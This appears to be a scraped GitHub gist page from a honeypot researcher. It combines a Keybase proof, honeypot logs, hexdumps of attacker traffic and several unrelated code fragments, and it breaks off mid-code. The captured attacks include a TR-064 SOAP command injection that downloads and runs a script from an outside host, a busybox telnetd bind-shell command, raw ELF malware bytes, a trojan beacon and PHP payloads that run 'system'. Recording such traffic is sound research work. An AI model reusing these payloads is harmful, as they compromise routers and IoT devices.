Keybase proof

I hereby claim:

  • I am glaslos on github.
  • I am lukas_rist (https://keybase.io/lukas_rist) on keybase.
  • I have a public key whose fingerprint is 4E4C AF1B 47DA 9D1A 8BDF 5B66 D205 7E64 41E8 D9EA

To claim this, I am signing this object:

package glutton

import (
	"context"
	"net"
	"strings"

	"go.uber.org/zap"
)
glaslos / Unsolicited
Created March 29, 2017 10:06
Unsolicited response received on idle HTTP channel
2017/03/28 11:57:55 Unsolicited response received on idle HTTP channel starting with "\u007fELF\x01\x01\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00(\x00\x01\x00\x00\x00\x90&\x02\x004\x00\x00\x00\x00\x00\x00\x00\x02\x02\x00\x054\x00 \x00\x02\x00(\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00a7\x01\x00a7\x01\x00\x05\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\xfc\x06\x00\x00\xfc\x06\x05\x00\xfc\x06\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x01\x00\xef\x8c\xc4c\xf5\x96\xa4\xb5\xf0\x10\r\x17\x00\x00\x00\x00Ц\x02\x00Ц\x02\x00\xd4\x00\x00\x00i\x00\x00\x00\x0e\x00\x00\x00\x1a\x03\x00?\x91E\x84h;\xdeަ\x0f#\xf0\xd4$\x19u\xd8FO\xb5\xdd\xea\xce\xe0J\xbeHz!\xaeZ\t\xa1\x00\xf1\xa1+\x89~K\f6,\x9b?/]\x8aTd\x04D\aV:\xa8\xe1\xbc Ɠqw&\xc1\xa4\xe2.\xae\xb2\x0f\xd7\t\xfe\xa2\xa3\xc4\f\x8a\rK\xc9&0=^J;\xbbZ\x8cb#\xe3\xce;\xc7XTN\xc0 \f\x99\x02\x00\xdb#\x01\x00\x0eP\x00\x00\x1a\x03\x00\x06\xb0\x8fm\xa7\x01\xaat\x15O\xe8&\x11e\xf9\xd1\xf7\xb7A\xf6,\xa8\u05fb:4\xf4Ȕ\x0e
DEBU[70484] [glutton ] new connection: 94.102.51.26:33622 -> 9100
DEBU[70484] [gollum ] response: 200 OK
INFO[70484] [log.tcp ] 94.102.51.26
00000000 52 45 41 44 20 2d 2d 3e 0a 2d 2d 2d 2d 2d 2d 2d |READ -->.-------|
00000010 0a 73 74 61 63 6b 6f 76 65 72 66 6c 6f 77 69 6e |.stackoverflowin|
00000020 20 68 61 73 20 72 65 74 75 72 6e 65 64 20 74 6f | has returned to|
00000030 20 68 69 73 20 67 6c 6f 72 79 2c 0a 79 6f 75 72 | his glory,.your|
00000040 20 70 72 69 6e 74 65 72 20 69 73 20 70 61 72 74 | printer is part|
00000050 20 6f 66 20 61 20 62 6f 74 6e 65 74 2c 0a 74 68 | of a botnet,.th|
00000060 65 20 67 6f 64 20 68 61 73 20 72 65 74 75 72 6e |e god has return|
DEBU[5636] [glutton ] new connection: 115.212.186.110:49904 -> 6789
INFO[5636] [log.tcp ] 115.212.186.110
00000000 0d 0a 38 38 38 38 38 38 0d 0a 38 38 38 38 38 38 |..888888..888888|
00000010 0d 0a 73 68 65 6c 6c 0d 0a 22 60 62 75 73 79 62 |..shell.."`busyb|
00000020 6f 78 20 74 65 6c 6e 65 74 64 20 2d 70 20 31 39 |ox telnetd -p 19|
00000030 30 35 38 20 2d 6c 20 2f 62 69 6e 2f 73 68 60 22 |058 -l /bin/sh`"|
00000040 0d 0a 22 60 62 75 73 79 62 6f 78 20 74 65 6c 6e |.."`busybox teln|
00000050 65 74 64 20 2d 70 20 31 39 30 35 38 20 2d 6c 20 |etd -p 19058 -l |
00000060 2f 62 69 6e 2f 73 68 60 22 0d 0a |/bin/sh`"..|
00000000 6c 76 7c 27 7c 27 7c 56 48 4a 76 61 6d 46 75 58 |lv|'|'|VHJvamFuX|
00000010 30 4d 30 4e 6b 59 32 52 54 6b 3d 7c 27 7c 27 7c |0M0NkY2RTk=|'|'||
00000020 4d 41 52 4b 7c 27 7c 27 7c 75 73 65 72 7c 27 7c |MARK|'|'|user|'||
00000030 27 7c 32 30 31 33 2d 31 31 2d 32 32 7c 27 7c 27 |'|2013-11-22|'|'|
00000040 7c 7c 27 7c 27 7c 57 69 6e 20 58 50 7c 27 7c 27 |||'|'|Win XP|'|'|
00000050 7c 4e 6f 7c 27 7c 27 7c 30 2e 36 2e 34 7c 27 7c ||No|'|'|0.6.4|'||
00000060 27 7c 2e 2e 7c 27 7c 27 7c 7c 27 7c 27 7c 5b 65 |'|..|'|'||'|'|[e|
00000070 6e 64 6f 66 5d |ndof]|
>>> base64.b64decode("VHJvamFuX0M0NkY2RTk=")
glaslos / SOAP.xml
Created January 9, 2017 12:00
Get me some soap...
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /var/tmp;cd /tmp;wget http://glzfk.pw:8080/a;sh a`</NewNTPServer1>
<NewNTPServer2/>
<NewNTPServer3/>
<NewNTPServer4/>
<NewNTPServer5/>
</u:SetNTPServers>
<?php echo("test successful"); ?>
<?php
system("uname -a");
?>
import sys
import tty
import termios
fd = sys.stdin.fileno()
# keep original terminal settings
old_settings = termios.tcgetattr(fd)